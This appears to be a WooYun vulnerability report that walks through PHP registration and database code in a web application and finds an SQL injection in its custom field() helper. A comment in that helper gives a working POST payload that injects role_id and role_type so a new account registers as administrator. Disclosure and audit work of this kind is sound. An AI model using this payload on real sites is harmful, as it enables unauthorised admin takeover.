WooYun.org

function DoRegister() 
	{
				if(MEMBER_ID != 0 AND false == $this->IsAdmin)
		{
			$this->Messager('您已经是注册用户，无需再注册！', -1);
		}
......
		
        $this->Post = array_iconv('UTF-8', $this->Config['charset'], $this->Post);
		$password = $this->Post['password']; //密码
		$email = $this->Post['email']; //email
		$username = $nickname = $this->Post['nickname']; //用户名
		
		if(strlen($password) < 5)
        {
			$this->Messager("密码过短，请设置至少5位",-1);
		}
		
		$uid = jsg_member_register($nickname, $password, $email);//注册,不是关键函数，步过。
		if($uid < 1)
		{
			$regconf = ConfigHandler::get('register');
			$rets = array(
	        	'0' => '【注册失败】有可能是站点关闭了注册功能',
	        	'-1' => '帐户/昵称 不合法，含有不允许注册的字符，请尝试更换一个。',
	        	'-2' => '帐户/昵称 不允许注册，含有被保留的字符，请尝试更换一个。',
	        	'-3' => '帐户/昵称 已经存在了，请尝试更换一个。',
	        	'-4' => 'Email 不合法，请输入正确的Email地址。',
	        	'-5' => 'Email 不允许注册，请尝试更换一个。',
	        	'-6' => 'Email 已经存在了，请尝试更换一个。',
				'-7' => '您的IP地址 ' . $GLOBALS['_J']['client_ip'] . ' 已经被限制注册了（一个IP地址 '.$regconf['time_html'].' 之内，最多只能注册 '.$regconf['limit'].' 个用户），请稍后再试或联系管理员',
	        );
	        $this->Messager($rets[$uid], null);
		}
		
		$datas = array();
		$datas['uid'] = $uid;
		$datas['province'] = $this->Post['province']; 		$datas['city'] = $this->Post['city'];		if($this->_sms_register())
		{
			$datas['phone'] = $sms_bind_num;
		}
		jtable('members')->update($datas);//跟进0x01
......
	}

static function update($table, $data, $condition, $unbuffered = false, $low_priority = false)
	{
		$sql = DB::field($data); //问题出在自定义field函数上，跟进
		$cmd = "UPDATE ".($low_priority ? 'LOW_PRIORITY' : '');
		$table = DB::table($table);
		$res = DB::query("$cmd $table SET $sql ".DB::where($condition), $unbuffered ? 'UNBUFFERED' : '');
		return $res;
	}
static function field($array, $glue = ',', $is_where=0) {
		$sql = $comma = '';
		
		foreach ($array as $k => $v) {
			$s = '';
			
			if(is_array($v)) {//遍历传递过来的数组的值，检查每一个值是否为数组，是数组则往下执行。
				
				$g = $v['glue'];把键名为glue的数组的值赋值给$g
				if($g) {
					$kk = ($v['key'] ? $v['key'] : $k); //把键名为key的数组的值赋值给$kk
					$vv = $v['val'];//把键名为vlue的数组的值赋值给$vv
					switch ($g) {//$g就是符号，我们构造$g为等号，也就是构造$v['glue']的值为=号。
						case '=':
						case '>':
						case '<':
						case '<>':
						case '>=':
						case '<=':
							$s = "`{$kk}`{$g}'{$vv}'"; /*$kk的值,$vv的值都需要构造，我们虽然不能引入单引号，但是我们能引入反引号，反引号不受GPC的限制，$kk在反引号内，而且$kk我们可控。所以只要用到了这个field函数，随便找一个我们能控制的域，把他以数组的方式提交即可。比如：$_POST['str']这个域，我们提交：str[glue]==&str[val]=endvlue&str[key]=beginkey`=beginvalue,`endkey
就成了
`beginkey`=beginvalue,`endkey`='endvlue'
关键点就在于这个str[key]闭合反引号
比如我的这个例子注册管理员，需要role_id=2,role_type=admin
我们提交province[glue]==&province[val]=admin&province[key]=role_id`=2,`role_type
即可
*/
							break;
						case '-':
						case '+':
						case '|':
						case '&':
						case '^':
							$s = "`{$kk}`=`{$kk}`{$g}'{$vv}'";
							break;
						case 'like':
							$s = "`{$kk}` LIKE('{$vv}')";
							break;
						case 'in':
						case 'notin':
							$s = "`{$kk}`".('notin'==$g ? ' NOT' : '')." IN(".jimplode($vv).")";
							break;
						default:
							exit("glue $g is invalid");
					}
				} else {
					if($is_where) {
						$s = "`{$k}` IN(".jimplode($v).")";
						
					}
				}
			} else {
				$s = "`{$k}`='$v'";
			}
			if($s) {
				$sql .= $comma . $s;
				$comma = $glue;
			}
		}
		return $sql;
	}